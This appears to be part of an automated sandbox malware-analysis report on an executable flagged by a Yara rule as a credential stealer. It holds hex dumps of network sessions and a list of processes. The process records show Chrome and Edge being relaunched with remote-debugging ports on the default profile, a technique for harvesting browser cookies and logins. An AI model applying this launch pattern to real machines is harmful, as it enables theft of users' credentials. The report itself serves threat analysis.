                                                                                                                                                                                                                                                                                                2024-12-20 06:32:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 4b 51 2b 55 2b 74 79 75 45 53 6a 6c 66 62 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 38 36 35 34 63 36 36 65 39 37 39 38 36 37 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: NKQ+U+tyuESjlfbu.1Context: c78654c66e979867
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:07 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4e 4b 51 2b 55 2b 74 79 75 45 53 6a 6c 66 62 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 38 36 35 34 63 36 36 65 39 37 39 38 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: NKQ+U+tyuESjlfbu.2Context: c78654c66e979867<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 4b 51 2b 55 2b 74 79 75 45 53 6a 6c 66 62 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 38 36 35 34 63 36 36 65 39 37 39 38 36 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: NKQ+U+tyuESjlfbu.3Context: c78654c66e979867<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 42 36 6d 55 73 30 74 7a 6b 4f 67 59 6b 69 71 42 66 5a 35 2f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: WB6mUs0tzkOgYkiqBfZ5/Q.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                66192.168.2.65006120.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:22 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 47 4e 54 4e 38 4e 52 57 33 30 57 57 67 75 30 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 65 64 37 30 64 32 34 33 39 39 62 31 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 304MS-CV: GNTN8NRW30WWgu0/.1Context: a7ed70d24399b18
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:22 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 47 4e 54 4e 38 4e 52 57 33 30 57 57 67 75 30 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 65 64 37 30 64 32 34 33 39 39 62 31 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33 39
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: GNTN8NRW30WWgu0/.2Context: a7ed70d24399b18<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb39
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:22 UTC73OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 35 0d 0a 4d 53 2d 43 56 3a 20 47 4e 54 4e 38 4e 52 57 33 30 57 57 67 75 30 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 37 65 64 37 30 64 32 34 33 39 39 62 31 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 55MS-CV: GNTN8NRW30WWgu0/.3Context: a7ed70d24399b18
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:23 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:23 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 42 4b 54 32 4f 38 61 64 55 6d 6d 77 73 4c 6b 63 39 79 36 4b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: hBKT2O8adUmmwsLkc9y6Kg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                67192.168.2.65010320.198.118.190443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:40 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 51 54 67 59 31 2f 76 35 54 30 6d 50 4b 55 70 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 33 66 30 30 38 63 65 66 30 38 39 66 61 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: QTgY1/v5T0mPKUpE.1Context: 543f008cef089fac
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:40 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:40 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 51 54 67 59 31 2f 76 35 54 30 6d 50 4b 55 70 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 33 66 30 30 38 63 65 66 30 38 39 66 61 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: QTgY1/v5T0mPKUpE.2Context: 543f008cef089fac<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:40 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 51 54 67 59 31 2f 76 35 54 30 6d 50 4b 55 70 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 33 66 30 30 38 63 65 66 30 38 39 66 61 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: QTgY1/v5T0mPKUpE.3Context: 543f008cef089fac<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:41 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:41 UTC58INData Raw: 4d 53 2d 43 56 3a 20 30 7a 2f 4d 75 4d 58 42 46 6b 79 62 49 7a 43 48 52 50 53 66 4d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: 0z/MuMXBFkybIzCHRPSfMg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                68192.168.2.65015420.198.118.190443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 6d 4f 2b 32 54 52 44 69 6b 47 4a 33 37 6d 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 33 35 38 65 30 66 38 65 63 35 36 36 30 66 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: bmO+2TRDikGJ37mc.1Context: 4358e0f8ec5660fc
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:01 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 6d 4f 2b 32 54 52 44 69 6b 47 4a 33 37 6d 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 33 35 38 65 30 66 38 65 63 35 36 36 30 66 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bmO+2TRDikGJ37mc.2Context: 4358e0f8ec5660fc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:01 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 62 6d 4f 2b 32 54 52 44 69 6b 47 4a 33 37 6d 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 33 35 38 65 30 66 38 65 63 35 36 36 30 66 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: bmO+2TRDikGJ37mc.3Context: 4358e0f8ec5660fc
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:33:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 45 41 44 75 47 43 65 32 6b 6b 6d 2b 33 51 6f 6a 73 78 31 50 64 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: EADuGCe2kkm+3Qojsx1PdA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:01:30:58
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\ktyihkdfesf.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                File size:147'968 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:01:31:15
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                Start time:01:31:16
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                Start time:01:31:30
                                                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:BF154738460E4AB1D388970E1AB13FAB
